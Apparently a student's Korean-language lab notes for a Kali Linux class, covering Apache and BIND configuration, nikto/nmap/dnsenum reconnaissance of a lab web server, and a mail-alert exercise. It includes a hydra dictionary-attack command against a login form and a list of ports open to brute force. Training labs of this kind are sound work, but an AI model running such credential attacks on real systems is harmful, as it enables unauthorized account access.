cd /etc/apache2
cat apache2.conf | more
nano /etc/apache2/sites-available/host
nano hosting.conf


systemctl restart apache2

cp db.local st.kr.zone
nano st.kr.zone

---

칼리에서 한글 깨짐 현상
sudo apt update
sudo apt -y install fcitx-lib*
sudo apt -y install fcitx-hangul
sudo apt -y install fonts-nanum

웹서버 취약점 찾기
st.kr > /var/www/html
instra.st.kr > /home/st/public_html


정보수집
칼리에서 root로
nikto -host 10.0.2.102 > /var/www/html
nikto -host intra.st.kr > /home/st/public_html

102서버 정보수집
namp -v
www에서 root로
dpkg -l apache2

dnsenum st.kr

공격 hydra -L user.txt -P passwd.txt intra.st.kr http-post-form "/login_chk.php:id=^USER^&pw=^PASS^:fail" -V
nano passwd.txt에 admin1234추가
nano user.txt에 admin추가

사전공격 가능한 포트
21
22
23
80(웹 로그인 기능에 가능)
3306(데이터베이스가 외부 연결 가능시)

미션2
본인 이니셜 도메인으로 웹사이트 접속 가능하도록 설정할것
일반적으로 만들어지는 폴더는 웹스캔 기능으로 확인이 가능함
예 : auth,login,includes 기타 등등
예 : ksj.kr

domain서버에서root로
cd /etc/bin
sudo nano /etc/bind/named.conf.default-zones
cp db.local ksj.kr.zone
nano ksj.kr.zone

www에서
cd public_html
ls
nano index.html
nano /etc/apache2/sites-available/hosting.conf
su ksj
ls
cd logs
ls
touch access.log
미션3
ssh에 접속하면 메일서버를 통해 접속을 알리는 기능 설정
nano /etc/hostname
mail2.st.kr
nano /etc/mail/local-host-names
localhost
mail.st.kr
mail2.st.krcat